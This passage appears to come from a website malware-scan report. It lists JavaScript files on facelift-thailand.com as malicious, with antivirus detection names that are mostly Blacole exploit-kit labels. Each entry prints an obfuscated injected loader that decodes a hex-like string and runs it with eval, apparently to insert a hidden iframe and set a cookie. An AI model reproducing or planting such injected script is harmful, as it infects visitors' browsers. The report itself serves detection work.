... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://facelift-thailand.com/x-js/videogallery.js | 200 OK Content-Length: 5980 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2
... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1129
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- TrojWare.JS.Kryptik.acc
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
https://lct.salesforce.com/sfga.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |